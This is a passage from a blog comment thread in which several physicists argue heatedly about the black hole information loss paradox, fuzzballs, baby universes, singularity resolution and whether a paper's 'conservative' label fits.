strengthen the case for a conservative resolution. As we argue, IF the singularities are eliminated, THEN unitarity is likely a consequence. One then has just to use that unitary evolution to see what the dynamics predicts about the final state. It may in fact be the case that all the information gets to infinity, to find out one has to solve the unitary evolution. Discussion about ways to resolve the paradox without singularity removal are then very possibly non-sequitors, because if the singularity is eliminated the problem is solved. Thanks Lee, it is probably most efficient to continue the private discussion. Just wanted to mention here for the sake of clarity that what we refer to as the information puzzle is a little different. For me this is the question of whether or not all the initial information is accessible to an observer staying outside the horizon at all times. I take it that you are asking whether the information is preserved "somewhere", which is a very different question. So for example, if there are baby universes carrying all the information, the answer to the first question is no, and to the second one is yes. So, for me this scenario translates to information loss, and for you it doesn't. The Horowitz and Maldacena option is not radical in the sense defined in the paper. Their modification is constrained to the region where one can expect quantum graviational effects to be strong, that's conservative. I find the motivation for imprinting the information in a boundary condition at the singularity weak, but that's a different point. I could indeed come to like that option if it wouldn't seem so ad hoc to me. Best, I assure you that you have asked the simple question that you don't remember to have asked, and it is very trivial for everyone to check this fact. Search this web page for: "But to one of your issues, how can anything happen at the horizon even if the curvatures are arbitrarily low. This is also well understood. In any quantum mechanical system with large degeneracies (as is typical for highly excited states), the following holds..." That's what Moshe wrote. And you asked: "Why do I have highly excited states if the curvature is arbitrarily low?" Sabine: I don't know who or what you are arguing with, but I never said anything of the sort that the black hole interior is empty or whatever it is you are trying to say. I was not trying to argue with you in any way. I was answering your question why the information could get out of the black hole. And I was answering it because I was hoping that you would have actually paid some attention to the answer to this important question rather than being disinterested in (or even annoyed by) all the key concepts behind the answer. Again, the answer is that at the level of microstates, the causal diagram derived from an empty classical black hole is not applicable which means that one cannot prove that no information can escape. That's what I mean by saying that microstates don't respect the causal rules of a simple classical black hole solution. Sabine: Ah. And exactly how is this compatible with your above, correct, observation that what has crossed the horizon stays inside, and moreover can't even stay close by the horizon? I'm asking for a local dynamical explanation for what happens to the information. As far as I know fuzzballs create significant distortions of locality at horizon scales. It is perfectly compatible. States with one spaceship - and the rest of the BH interior being (almost) empty - are much closer to the completely averaged black hole mixed states than a generic fuzzball solution, and the classical geometry around the spaceship becomes almost exactly applicable. When we already know that vast regions of the interior are almost flat, it guarantees that we must have already taken the average over very (exponentially) many microstates. On the other hand, the geometry of the BH interior is never exact for a subset of states (or even one pure microstate), and it is never exactly true that the information cannot get from the spaceship outside the black hole - small effects can do it. It's a normal thing for this information to do whatever it wants to do: on the contrary, the ability to hold the information isolated inside is an "emergent phenomenon" obtained by averaging over sufficiently many eigenstates so that the effective geometry (almost) mimicks the classical black hole and all objects have to respect the causal rules of this classical black hole. Again, individual microstates don't look like this, and they don't respect this causal diagram. Correct, it has been lost for the physical observer in the asymptotically flat region. The point is however that the evolution remains unitary if you take into acount the full endstate, which includes the disconnected part. I personally don't think that's such a particularly compelling scenario, but it's certainly a possibility. The problem with this statement about the preservation of the information in other universes is not that it is not compelling. The problem is that it is physically meaningless. For whatever non-unitary evolution, one could always argue that the information is preserved in another Universe or in God's memory, or whatever. In all these metaphysical and religious scenarios, the information is lost from the viewpoint of physics. It may be preserved from the viewpoint of metaphysics but I was talking about physics which measures the information, by the definition of physics, in the experimentally accessible universe only. Sabine (to orbifold): Your argument is a non-starter. A) I was explicitly not referring to curvature singularities, but more importantly B) I wasn't saying if you don't have a singularity, you don't have a problem. Of course that you were. Open your paper on page 3. You write: "But we do note that there is recent work that does show that, in a particular model of quantum gravity, black hole singularities are removed in a way that leads to the restoration of unitary evolution. This result has been derived in a study of the CGHS [9] model by Ashtekar et al in [10]. They find results that confirm earlier arguments in [12]. Part of the motivation of this paper is to put their results in a broader context." Maybe you should read your paper before you discuss on the blog. Sabine: If you want to provide a counterexample, you'd have to find a case with singularity but without paradox, and not a case without singularity but with paradox. This counterexample has been mentioned about five times on this page already, too. I am talking about Maldacena 2001, the eternal AdS black holes. Figure 1 shows that he is talking about a spacetime with spacelike singularities. By constructing a dual boundary description with two boundaries, he is able to explicitly show that the information is fully preserved. One can say that the singularities are "resolved" but the resolution is not a new geometry which draws something completely different than singularities at the beginning or the end. The resolution is the AdS/CFT boundary dual which actually allows one to calculate what's happening in the spacetime, including the arbitrary vicinity of the two singularities. Indeed, everybody can check this comment section to find out what I said. I have no time and no interest to play silly games like this. That's what I mean by saying that microstates don't respect the causal rules of a simple classical black hole solution. Thanks, fine. Now what is your problem? You have a solution approach, according to our terminology it is "radical", you can decide for yourself whether you find that flattering or insulting. On the other hand, the geometry of the BH interior is never exact for a subset of states (or even one pure microstate), and it is never exactly true that the information cannot get from the spaceship outside the black hole - small effects can do it. Does the fuzzball have an event horizon at all? I think it is pointless to argue about what the interesting aspect of the information loss problem is, clearly your interests are elsewhere than mine. It seems to me btw this is the same point as Moshe and Lee have been discussing, see above comments for clarification. I wasn't saying if you don't have a singularity, you don't have a problem. Of course that you were. Open your paper on page 3. You write: "But we do note that there is recent work that does show that, in a particular model of quantum gravity, black hole singularities are removed in a way that leads to the restoration of unitary evolution. This result has been derived in a study of the CGHS [9] model by Ashtekar et al in [10]. They find results that confirm earlier arguments in [12]. Part of the motivation of this paper is to put their results in a broader context." Maybe you should read your paper before you discuss on the blog. Maybe you should try to understand what I was saying before commenting on it? The paragraph you quotes says very clearly: There is a model XYZ in which the singularity is removed due to quantum gravitational effects and the resulting evolution is unitary. This is very different from saying whenever you get rid of the singularity, you have solved the problem. This counterexample has been mentioned about five times on this page already, too. I am talking about Maldacena 2001, the eternal AdS black holes. Figure 1 shows that he is talking about a spacetime with spacelike singularities. I'm not interested in eternal black holes, and even less interested in eternal black holes in AdS space. I am interested in describing nature. We have stated in the paper which black hole spacetimes we are considering. Best, I can therefore only imagine how this must be for you and others who have this as their profession when picking up to read such a book. Well, as you can imagine I usually skip the first some chapters. How many introductions to special relativity does one really need to read in once lifetime? I therefore very much appreciate it if the author makes sure the reader doesn't miss anything by skipping these parts and states in the preface (as one often finds), if you know A, B, C you can skip chapters 2,3,4 etc. Yes, the measurement process in quantum mechanics itself is non-deterministic and non-unitary. The problem with the black hole evolution however occurs already before that. One can then discuss however how much non-unitarity is really worrisome to begin with. There are certainly people who have considered the option of just accepting non-unitarity. It is however argued (quite convincingly it seems to me) that this generically leads to non-neglibile violations of energy conservation. I have the impression however the issue isn't yet completely settled. Best, I didn't ask why the object that is supposed to describe a fermion is stable or static, I was asking why it has a specific descrete mass spectrum that happens to coincide with the masses of fermions we have measured. You need a non-vanishing trace of the energy momentum tensor because otherwise the object doesn't describe a massive fermion. Best, In that case, I don't understand why you're playing these games in such a shortage of time. You asked a question to Moshe, he answered it, you asked it again, and I answered it again, using different words. Then you denied that you had ever asked the question. What's the point here? In science, we are used to asking questions because we are actually interested in the answers. Sabine: Thanks, fine. Now what is your problem? You have a solution approach, according to our terminology it is "radical", you can decide for yourself whether you find that flattering or insulting. I or we no longer have any major problem because the problem has been solved at the qualitative level, to say the least. The solution I sketched is not mine, it is the summary of one of the most important results of the theoretical physics community in the last 10 years. Whether you use one adjective or another - a more sensible one or, in your case, a less sensible one - has clearly no impact on the status of the solution to the information loss paradox. Sabine: Does the fuzzball have an event horizon at all? No, fuzzballs don't have any event horizons. Do you hear this statement for the first time? Event horizons are approximate notions obtained by averaging over all (or a huge number) of microstates. A particular pure microstate has a vanishing entropy which translates into a vanishing area of event horizons. Sabine: I think it is pointless to argue about what the interesting aspect of the information loss problem is, clearly your interests are elsewhere than mine. I don't think that the basic discussion about similar important problems in physics is about interesting vs uninteresting questions. It is about correct vs incorrect answers. Sabine: There is a model XYZ in which the singularity is removed due to quantum gravitational effects and the resulting evolution is unitary. This is very different from saying whenever you get rid of the singularity, you have solved the problem. The problem is that there is no model in which the removal of singularity can solve the information loss problem because this problem has nothing whatsoever to do with singularity. Now you're just trying to marginalize this whole point into "just one model" but you wrote very clearly that the motivation for writing your paper was exactly the result of this "model" that you wanted to put into broader perspective. At any rate, these issues about stronger and weaker language are not too important because all your statements, both the weak and the strong ones, are completely incorrect. Sabine: I'm not interested in eternal black holes, and even less interested in eternal black holes in AdS space. I am interested in describing nature. We have stated in the paper which black hole spacetimes we are considering. You were seemingly interested in them a few minutes ago because you were asking orbifold bh for a counterexample to one of your statements. At any rate, your implicit idea that the qualitative character of the solution to the information loss problems is very different for Maldacena's eternal black holes and for other black holes in quantum gravity is completely wrong, too. I could have used non-eternal black holes, too, including Schwarzschild in ordinary AdS - with the disadvantage that the singularity is further from the boundary in that case. But I guess that you're not interested in this statement about the universality and rigidity of these results, either, so I profoundly apologize for having bothered you with physics. Sure, I think we all understand that you are saying string theory has solved the problem, thanks for the clarification. No, fuzzballs don't have any event horizons. Do you hear this statement for the first time? I just wanted to make sure we're on the same page, since you said earlier the only option you consider viable is option (1). Just that this option has an event horizon. Funny, isn't it? What it amounts to is that you need a distortion of that causal structure (call it 'microscopical' or whatever) that allows information to not be confined to that region. I understand you are saying fuzzballs provide such a scenario. I never questioned that. I'm not interested in eternal black holes, and even less interested in eternal black holes in AdS space. I am interested in describing nature. We have stated in the paper which black hole spacetimes we are considering. You were seemingly interested in them a few minutes ago because you were asking orbifold bh for a counterexample to one of your statements. My apologies. I guess I should have noticed by now that you are either unwilling or indeed unable to fill in details of a sentence that I consider obvious. In this case I was obviously talking about a counterexample to the statement that is in the paper. your implicit idea that the qualitative character of the solution to the information loss problems is very different for Maldacena's eternal black holes and for other black holes in quantum gravity is completely wrong, too. I could have used non-eternal black holes, too, including Schwarzschild in ordinary AdS [...] I profoundly apologize for having bothered you with physics. If you are interested in physics, then why don't you point me to a string-theoretical study of the formation of a black hole from e.g a pressure free collapsing dust (preferably in a spacetime that actually describes our universe) and subsequent evaporation of that black hole which does indeed have a quantum singularity but no information loss and thus provides the counterexample you were just claiming exists? Sabine: I just wanted to make sure we're on the same page, since you said earlier the only option you consider viable is option (1). Just that this option has an event horizon. Funny, isn't it? No, it's not funny at all. The figure (1) is the correct macroscopic description of the fate of a Schwarzschild black hole spacetime. However, the macroscopic picture (1) itself doesn't contain all the tools to explain what happens with the information. To do so, one must actually look at individual microstates, and pure generic microstates don't look like (1) and don't have any event horizon. As has been written about 10 times (by Moshe and others) already, (1) is the "thermodynamic" limit of averaging over (almost) all of these microstates. I will happily write this answer for the 12th time, too, but one may be slowly approaching a reasonable limit. Sabine: My apologies. I guess I should have noticed by now that you are either unwilling or indeed unable to fill in details of a sentence that I consider obvious. In this case I was obviously talking about a counterexample to the statement that is in the paper. I have given you counterexamples to the particular assertion in your paper but you wrote you were not interested in them. And in fact, you still seem to be completely uninterested in any counterexamples or any other physical topics relevant for the quantum physics of black holes. Sabine: If you are interested in physics, then why don't you point me to a string-theoretical study of the formation of a black hole from e.g a pressure free collapsing dust (preferably in a spacetime that actually describes our universe) and subsequent evaporation of that black hole which does indeed have a quantum singularity but no information loss and thus provides the counterexample you were just claiming exists? Well, the reason is very simple. Because, as every physicist worth the name understands, whether a black hole is born from a collapsing cloud of dust or from adding worthless manuscripts into a near-critically heavy neutron stars has absolutely no impact on the qualitative physics of the black holes. The resulting black holes clearly have the same properties (by all the no-hair theorems, thermalization, etc.) and the same way to encode the information. String theorists are not writing special papers about the information loss of black holes created out of dust because such papers would be intellectually deficient combinations of two problems that have clearly nothing to do with each other and no author with a difficulty to see this simple point could ever learn string theory and write papers about it. But once again, everyone, including non-string theorists, is free to write papers about anything she finds fit or conservative. He or she doesn't have to be affected by any standards that are natural elsewhere. I will happily write this answer for the 12th time, too, but one may be slowly approaching a reasonable limit. You can save yourself a lot of time if you would not try to "answer" questions I didn't ask. I understand that the microstates you are considering are not bothered the classical causality and that this effect happens on horizon scales. This is a scenario that according to our classification is "radical". I don't know what there is more to say. Your notion of what is "physical," "natural," or "interesting" clearly does not match with mine, but then I already knew that. The information content of your comments has approached zero. I have made my points clear, you are fuzzing around, probably upset - as usual - that I am not advocating string theory. It's an entierely useless back and forth, I herewith consider this exchange finished. Come on, Sabine. If I understand well, Moshe and Lobos were just explaining us why the 'radical' solution is in fact 'conservative' and nearly established. I am just a chemical physicist but there seems to be nothing strange about objects of a high entropy that have some internal structure that stretches across the full volume that these objects occupy in space. What is important in GTR is whether in realistic situations with ordinary matter, one will contradict equations of GTR in circumstances where it should apply. And they say 'No', they will hold after the averaging, much like if we calculate the index of refraction of a gas (which otherwise behaves as smoothly as the vacuum) by averaging over the effect of all the complicated and chaotic atoms in this gas. I don't actually know whether they can prove or show that GTR emerges by averaging over their complicated microstates but I guess they have some reasons to say so. Respectfully, I would disagree that there is anything 'radical' about an internal structure of bound states of a high entropy. Indeed it has become clear to me that our notion of "conservative" is not shared by other people. I can't say this came very unexpectedly. I just honestly don't know what good it is to argue on the use of words. there seems to be nothing strange about objects of a high entropy that have some internal structure that stretches across the full volume that these objects occupy in space. No, of course not. Except that the 'stretching' to fill that volume isn't in agreement with the classical causal structure of these objects, and that doesn't explain how microscopically the information is transferred from the matter that collapsed to the outgoing radiation. Best, “Indeed it has become clear to me that our notion of "conservative" is not shared by other people.” Yes from my admittedly unqualified perspective the fuss seems to focus around the choice of words, so perhaps you should consider subtitling your paper to better express one choice of meaning assigned to “conservative” found in the Webster’s , which say its “marked by moderation or caution” ; as a subtitle this could read: “Solutions for the Black Hole information problem narrowed to those less likely achieving throwing the baby out with the bath water.” Then again perhaps that’s too long a subtitle and therein requires further consideration :-) It is really interesting that here - as in several previous instances - when Lubos runs out of arguments we get some anonymous or pseudoanonymous comments that echo what he couldn't convince anybody of believing. 1. How come that neither your nor Lubos are able to tell anybody which statement of mine allegedly contradicted which statement? 2. This merely expresses your disliking of our choice of words. There is nothing to "get" here. 3. I indeed disagree with my co-author on the relevance of these results and he knows that. It seems very clear to me the problem with your paper vis. Lubos. You have used the term 'Conservative' when in fact you tend more towards the blue side of things, aka 'Liberal'. As Lubos is without a doubt 'Conservative' it would appear he is upset you have tried to steal or otherwise co=opt his identity. Just trying to lighten things up a bit! I'll take a gander at your paper tomorrow but suspect it above my paygrade. Re: "It is really interesting that here - as in several previous instances - when Lubos runs out of arguments we get some anonymous or pseudoanonymous comments that echo what he couldn't convince anybody of believing." Sabine, I've just read your next post (huge fan!) and you are not only a notorious pessimist but an equally notorious paranoid. Peter Shor, the point is precisely that the black hole should be thought of as a generic highly excited state of a unitary chaotic system. Those states are very dense, almost degenerate. To distinguish one of those states from the others you have to measure S bits of information. If the information on the initial pure state is all encoded in the Hawking radiation, you have to measure S bits of information encoded in that radiation to decide which state you started with. You could for example measure one simple quantity (like the total energy) to S decimal places. By the uncertainty relation that will take a very long time. Or you can measure the time sequence, e.g the same quantity at S different times. Or anything else really, as long as you gain S bits of information. The point is that for any of those measurements you will need more than semi-classical gravity has to offer. The fact that you cannot distinguish the black hole states from each other, or from a thermal state, using order one bits of information (measuring simple quantities, whose complexity does not scale with the entropy, to a fixed accuracy, which also does not scale with the entropy) should not be surprising. Dear Spinfoam, the coarse-graining (summing over many microstates) leads to gravitational description, see e.g. a paper by Alday, de Boer et al. I don't think that they're extremely universal and show everything we want to know but they're surely a "proof of a concept". It may sound remarkable that by summing over many/all chaotic microstates, one gets such a simple description. On the other hand, that's what has to happen in any thermodynamic limit - which simplifies things. Sabine: if you disagree (as you just wrote) with Lee Smolin who says that Ashtekar et al. models to "solve the loss by removing singularity" are important, you shouldn't have agreed to become a co-author of a paper whose main purpose is to promote these results and put them into broader perspective, as the paper itself claims. Your discussion with Anonymous whether she or he's me is, well, amusing, but I understand that you probably can't settle it by an experiment so you have to rely on your natural beliefs. Otherwise, Lee Smolin's unfortunate choice of words ("conservative") was clearly deliberate and meant to introduce bias - to present a fringe, unlikely approach as a sensible and serious one (at least for those who can be fooled by adjectives). I think that physicists should stick to evidence and allow others to think which solution is conservative, especially if they know that the justification for their adjectives will be inevitably misunderstood by the readers. Sabine, I've just read your next post (huge fan!) and you are not only a notorious pessimist but an equally notorious paranoid. I should add that this combo is actually not that uncommon! Thanks, I am glad you like the new post for you will probably see it on the front page for the rest of the week, I am presently somewhat stressed out. The comment you are referring to was actually a rare expression of optimisim. I was thinking there can't possibly be two different people in the world that unable to extract meaning from simply phrased conversations. Now see where that optimism got me. I agree on everything that is stated in the paper. Having a co-author does luckily not require to agree with that person neither on the motivation for writing the paper nor on the opinion about every single reference cited. 1) As I believe I also said to somebody else above, you can try to live with non-unitary evolution if you really want. There are certainly people who have investigated this possibility. Generically, non-unitary evolution (from the initial to the final state) however goes along with violations of energy conservation. I think the issue of how large these violations have to be and whether that could be acceptable is not completely settled. However, that is a solution attempt we have not considered in the paper. The point is not that there couldn't be something funny going on in the quantum gravitational region, the point is that this fun wouldn't neatly stay there but affect the evolution from one asymptotically flat region to another. 2) I don't think I ever said something about the question 'where the black hole entropy is coming from', I am not even sure what that means. But yes, for all we currently know, there is no way we will be able to measure Hawking radiation any time soon (except possibly the LHC does indeed create micro black holes). 3) I think it is doable with some more effort at least to construct models that can fill in this spot without causing any disastrous problems, and I am confident these will increase our understanding about what is going on under such extreme conditions. I don't know of any way how this could be experimentally testable. That doesn't mean however nobody will ever be able to find a way. Thanks for your reply, amidst all this heated exchange of opinions!... Regarding the Planck scale, it is possible that astrophysical data from gamma ray bursts and Dark Matter detectors will provide some clues in the long run. But this is far from being a sure thing. I also hope (like everyone else) that LHC will help us understand what is going on in the TeV sector and (maybe) give us further hints on what's happening above this scale! In any event, congratulations to you and Lee for a well-written report! Maybe someone in this thread could give me an argument why causally seperated baby universe creation is a possibility that isn't automatically excluded by observation. I realize that from the point of view of an observer in the flat space, he/she will still have an information loss problem. He will rightly conclude that information is lost in his universe and that physics in his local patch is nonunitary and its only in the full picture with all the baby universes taken into account that unitarity is restored. Now shouldn't this imply drastic violations of energy conservation? From the point of view of the global evolution of the universe each time you create a blackhole, it acts like an energy sink. Wouldn't this completely alter the basic models of large scale structure formation? In fact you could imagine that it would change the FRW solutions by adding time dependant fields. You could go from a k = 0 universe to a k = -1 universe almost instantly! =/ Well, for one how many black holes do you think have completely evaporated during the history of our universe? Though it is hard to say with certainty, my (very conservative) estimate would be none. One can speculate about primordial black holes if you really want to. However, more important than that, I think you have a confusion about the scenario we were considering: shouldn't this imply drastic violations of energy conservation? From the point of view of the global evolution of the universe each time you create a blackhole, it acts like an energy sink. When you create the black hole, it can carry a lot of energy indeed. Then it evaporates. And evaporates. And evaporates. Maybe some hundred billion years or so, depending on its initial mass. In the case with the baby universe, it just keeps on evaporating until the mass as measured by an observer at infinity vanishes. Then the interior disconnects. There is no loss of energy in the parent universe. Best, B. ___ @ All Anonymouses: Would you please be so kind to either use a pseudonym (chose option Name/URL, you don't have to enter an URL) or at least enumerate yourselves? It would make my life much easier. Thanks. Sabine: I agree on everything that is stated in the paper. Having a co-author does luckily not require to agree with that person neither on the motivation for writing the paper nor on the opinion about every single reference cited. what you write here is internally inconsistent. If you disagree with the motivation to write the paper - to promote Ashtekar et al. results and put them into a broader perspective - then you cannot possibly agree with "everything that is stated in the paper" because this motivation is explicitly stated in the first paragraph of page 3 of your paper. And by the way, the rest of the paper is about the very same thing - that the Ashtekar "conservative" nuking of the black hole diagram - is a great idea (almost as great and as conservative as storing information in baby universes and remnants). So you must still make your mind whether you agree with your paper or whether you think that the Ashtekar model is not an important insight showing how the black holes behave. Or, maybe, you don't have to make up your mind because none probably expects a coherent viewpoint on black holes, anyway. In the paper we write "we do note that there is recent work that does show that, in a particular model of quantum gravity, black hole singularities are removed in a way that leads to the restoration of unitary evolution" followed by the reference Lee mentioned above, and later "Part of the motivation of this paper is to put their results in a broader context." That broader context being not constraining to a particular model. What is your problem with that? That we have cited a paper by somebody you don't like? Gosh, Lubos, don't you have better things to do than telling other people what they should cite, how and when and whether you like the words they are using or not? Exactly what is allegedly "inconsistent" about anything I wrote? Ashtekar's paper is interesting and a contribution to the discussion that certainly deserves to be cited in the context of our paper. However, as far as I am concerned it is a 1+1 dimensional toy model that he likes - as he said in his talk at PI, check recording if you want - because one can use it to lead students in one lecture through a calculation explaining what black hole information loss is all about. Then they quantize that model and find the singularity is resolved and unitary evolution restored. That is great. Just that it isn't clear to me how much that tells about the evolution of real black holes, and that is what I am ultimately interested in. I would also like to know better when the information comes out. This is not in the present publication but is supposed to be in an upcoming one as I hear. So I guess we will have to wait for that paper in preparation. I hope that clarifies it. I would appreciate if you would stop trying to construct "disagreements" or "inconsistencies" that are not there. 1) It is possible that information is restored by the complete evaporation of the black hole as it reaches Planckian size. However, assuming that the information has not already come out in the Hawking radiation, it is obvious that this Planckian black hole will have to decay extremely slowly, since it has to release a huge amount of information using only a little energy. This behavior seems rather surprising(!) Does Ashtekar's model give this? If not, there's no way his story can be self-consistent. If it does that might convert this skeptic. 2) Contrary to popular belief, creation of baby universes does not necessarily lead to loss of information. This was heavily discussed in relation to wormholes twenty or so years ago, and was applied to black hole evaporation by Polchinski and Strominger. 3) I don't think it's accurate to say that little attention has been given to the "conservative" scenario in which the singularity is resolved and hence unitarity is restored. One finds much discussion of this in the papers from the mid 90s by Page, Polchinksi, ... But either the info comes out before the BH reaches the Planck scale (which requires spooky nonlocal effects), or the Planckian hole must have an extremely long lifetime, as noted in (1). What's missing is a direct and concrete calculation showing either of these possibilities. Hi Bee:It seems that this discussion presupposes that a BH is formed. Is it possible that there are actually no BHs per this paper axiv07121130 "Fate of gravitational collapse in semiclassical gravity"? I always felt that unless one can define exactly how matter behaves under the extreme conditions that might cause a BH, then a BH is pure spectulation. Data that supposely supports BH existence could also be explained by some exotic state of matter that we currently no nothing about. BHs are not defined by just be a high density but by the event horizon. No BH, no event horizon, no paradox. 1) you would have to specify what assumptions you're making about the information/energy ratio. There's a much more natural, robust, and well-established bound constraining these things, the holographic bound, that implies that these small region of space can't contain that much information. It follows, among other things, that remnants and baby universes are simply impossible, in agreement with microscopic analyses of spectrum in all specific descriptions of quantum gravity we know as of today. 2) the 20-year-old wormhole picture that you seem to refer to is due to Hawking; and Coleman. Hawking himself denounced it in Virtual Black Holes 1995, primarily because it destroys the nice BH thermodynamical relations. Hawking surely doesn't believe the picture today, and already the 1995 paper also dismisses the Polchinski-Strominger variation of the picture. The Polchinski-Strominger variation is similar and almost certainly not believed to be plausible by any major player who's been writing these papers 15 years ago. The progress simply went elsewhere and the relevance of the papers for physics gradually evaporated. Coleman's general idea remains something that physicists keep in mind but the newer progress has eliminated all of its relevance for the information loss paradox. Such a radical thing is simply not needed today because contradictions that were once thought to be inevitable were shown to be absent in the consistent theory that is known to exist. 3) You would need a full new consistent theory of quantum gravity that would qualitatively disagree with string theory to achieve your goal at your desired accuracy. It is just extremely unlikely to get. Sabine: if there are three opinions about the Ashtekar's paper(s) 1) it should be ignored and one should continue to freely say, like I and you (somewhere), that the removal of singularities is not sufficient to solve the information loss paradox 2) is an OK contribution to a discussion and good enough to be cited and mentioned 3) is important enough to serve as a part of motivation of writing another paper by other authors who want to put the paper into broader context, I apologize but each two options above are inconsistent with one another. Now you invented 2) to interpolate between 1) and 3) but for me, 2) itself is still inconsistent both with 1) and 3) while 1) and 3) remain as inconsistent as before. If you don't see this inconsistency, it is not too surprising that you can find dozens or infinitely many consistent enough and "conservative" theories of quantum gravity, among other cool things. Lubos: I honestly don't think it is your business to tell me which papers I am allowed to cite in the introductions of my papers. Since you asked so nicely, I have offerened my opinion about Ashtekar's paper above. You can take that as option 4) and check the box. If you read through what I wrote here and in the paper you will find that there is nothing "inconsistent" about it. Best, I always felt that unless one can define exactly how matter behaves under the extreme conditions that might cause a BH, then a BH is pure spectulation. You don't need any extreme conditions to form a black hole. The formation of a black horizon can take place at arbitrarily low average density. I think must have written this two dozen times on this blog, but I will repeat it once again because it is a very common misunderstanding: The formation of a black hole horizon can take place at arbitrarily low density, and thus arbitrarily low background curvature. The relevant question is whether a total mass M is inside a region smaller than its own Schwarzschild radius R_H ~ 2M. The density in that region goes with M/R_H^3 ~ 1/M^2 and thus drops with larger total mass. For a large mass, the density is very small, it is far from being extreme in any sense. The formation of a trapped surface is thus a very generic expectation of GR. You need radical measures to avoid it, not to get it. That btw is the reason why I don't find fuzzballs particularly plausible. Best, Regarding 1: Indeed, that is exactly the point I did not understand about Ashtekar's model. At least in his talk he said the information would come out early (before the Planck phase), and I am skeptic about that for the same reasons you mention. That however is not in his paper that is published. I think it is supposed to be in the upcoming paper, I hope that will clarify this. You are right that a direct and concrete calculation is missing. I hope to see one within the next years :-) Bee:Thanks for the reply. By BH forming conditions I am talking about mass densities that exceed those of a neutron star or a quark star. Something between a BH and a quark star does not seem to be theoritically eliminated. The question regarding BHs has always been: Do they exist in nature? Not if they form what are their properties. If you are talking about black holes of about solar mass, you can fiddle around with the equation of state of nuclear matter if you like. But that is hardly going to avoid black holes in general. Are you satisfied that BHs actually exist? Am I satisfied? Not sure what you mean with this. The formation of a black hole horizon is a very generic consequence of initial conditions in GR that plausibly exist throughout our universe. I find the evidence we have convincing. There are certainly other explanations - there are always other explanations for everything, but I'd say if it walks like a black hole and quacks like a black hole, I would call it a black hole. Unless I have good reason to throw out this conservative answer. And I see presently no good reason. What is considered the biggest problem with sending the information of a Planck mass black hole out to a baby universe that looks like ours? The entropy? Bee, I think I'm generally much more of a paranoid pessimist than you are so I think that's just another name for objective realist... and if only you could find a topic where Lubos and Amos could be on opposite ends of a debate, that would be real entertainment! At least in his talk he said the information would come out early (before the Planck phase), Hmm... looking at his paper he draws a Penrose diagram that looks like the standard one until one gets near the singularity, and he says that fluctuations in the geometry are small outside that region. It will be a neat trick if he manages to get the information out before the Planckian phase under those conditions. I find it a bit worrisome that he doesn't in his paper discuss this issue of how the info gets out, except in a very superficial way. Perhaps it would have been advisable to forgo the "mission accomplished" title before getting this straightened out. The reason might simply be that the paper is a PRL and they have a strict page limit. But yes, I too will be courious to see how they manage to do that, and I am looking forward to a more detailed explanation. Best, Peter: look at my comment above. I think we have a case of non-standard use of scientific terms. The question the authors of this paper discuss, and Ashtekar as well, is whether information is "destroyed" by the singularity, or whether it passes through it. This may be an interesting question, or it may be a pseudo-question, depending how the singularity is treated in QG. Be that as it may, this is not the question you and I (and nearly everyone ever thinking about the information paradox) have in mind, namely: does the information become accessible to an outside observer (i.e. observers like us), and if so when and how? In Ashtekar's model the mission he accomplishes is a smooth passage through a singularity, he does not discuss whether the information can then end up at the original external region, and one may be skeptical for all the well-known reasons. as a Gentleman, I will surely not annoy you with more inconsistencies! It's enough that I am annoyed by them. Now I understand a bit better why you dislike the fuzzball or nontrivial BH microstates in general. You think that by avoiding the horizon, one is "radically" modifying GR, in the same way as Chapline who says that BHs don't exist and superconductors etc. stop them from forming. ;-) Well, except that she's not modifying GR or denying their birth. In string theory, one can show e.g. that a graviton is exactly a vibration mode of a string, an object that seems to have much more internal structure. In fact, with high enough UV resolution, such a string extends over huge distances. But it's all just an unobservable illusion because this stringy graviton acts on matter exactly in the same way as a normal graviton - even though it also looks "extended". In the same way, black holes may be demonstrated to have an entropy, so they must have microstates, and it just happens that the microstates look very chaotic. But the issue one should try to understand is that the apparent "complexity" of such fuzzballs is only there if one studies really pure states and if one studies them with a perfect, Planckian resolution. Any averaging over space or many microstates will tend to smoothen the space and create horizons (or almost horizons). The universal message above is that "purely gravitational" things zimply have extended structure according to string theory - gravitons and black holes are structured objects whose influence on strings and branes (all other matter) can be demonstrated to be exactly equivalent to the purely gravitational objects (in the case of BH, after averaging over microstates). They can't really look structureless because even gravitons and space itself is made out of strings. All this stuff may sound very subtle but that's all possible because string theory is really a unifying theory of gravity and all other objects. So even though the fuzzball looks like a "completely different object" made out of non-gravitational "matter", it is really the same thing as a black hole microstate, and can be shown to act in the same way, on everything that can exist in the theory. In these cases, one shouldn't really even talk about "emergence" because e.g. the stringy graviton mode is *exactly* the same thing as a graviton. The point here is not to approximate anything. The formalism just works in such a way that it is a precise identity. One is literally proving that gravitons and holes have a microscopic structure and what it is. One can see similar things in Matrix theory, AdS/CFT, and elsewhere. For example, when one constructs a thermal state - out of microstates that can be explicitly constructed - it can be seen that e.g. in the path integral formalism, physics will have contributions from (Euclidean) black holes as long as the theory allows dynamical gravity in the bulk, which string theory always does. Indeed, it seems you have come much closer to understanding my disliking. I don't need to tell you that, but let me add for the interested reader who might not know, that the 'fuzz' inside the fuzzball fills up the region that would have been the interior of the horizon. In fact, the extension of these objects is not Planck sized or anything nearby, instead it is a number dependent on the initial (string) setting times the Planck scale that sets their extension. In this way, one gets violations of locality on distances scales of the horizon, which can be arbitrarily large, and at arbitrarily low background curvature. According to the terminology in our paper, this is "radical". It is certainly an interesting scenario. However, to solve the information loss problem it implies that some collapsing matter would have to fuzz out into some stringy state at arbitrarily low densities, somewhere around the time when classically the horizon would have formed - though I don't actually know of any dynamical investigation of the scenario that would describe such a collapse, so I am not sure one can actually conclude that. I also think the scenario assumes unbroken supersymmetry and most of the investigation has focused on extremal black holes, though I think there is some recent work to generalize this. Please correct me if I'm wrong, I am certainly not an expert on this. I think we have a case of non-standard use of scientific terms... this is not the question you and I (and nearly everyone ever thinking about the information paradox) have in mind Well, it is not of much use to discuss what either of us perceives as "standard use of scientific terms", but let me clarify the reason for our use of the term information loss problem. As far as I am concerned, what is paradoxical about the original setting Hawking discussed is that it leads us to conclude there is a disagreement between classical General Relativity and quantum mechanics - a non-unitary evolution - that can not simply be blamed on our not understanding of quantum gravitational effects. Non-unitary evolution implies information loss, thus the name information loss problem. However, there is nothing particularly paradoxical about an observer in region A not having information about region B. Generically, this will also lead to non-unitary information, but this is not in conflict with quantum mechanics, it thus doesn't bother me. Now one could of course say it is not nice if the observer at A never learns what is in region B. This reminds me of a discussion on the issue I had a long time ago with my first supervisor. His final argument for disliking such a possibility was that God would not disconnect himself from a region of his spacetime. Bee, you can discuss whichever issue you find more interesting, we do seem to disagree on what issue is the real puzzle, but there is no point in arguing about that. However, I am just observing that there is a lot of people talking past each other here, in part because what you call the information paradox is 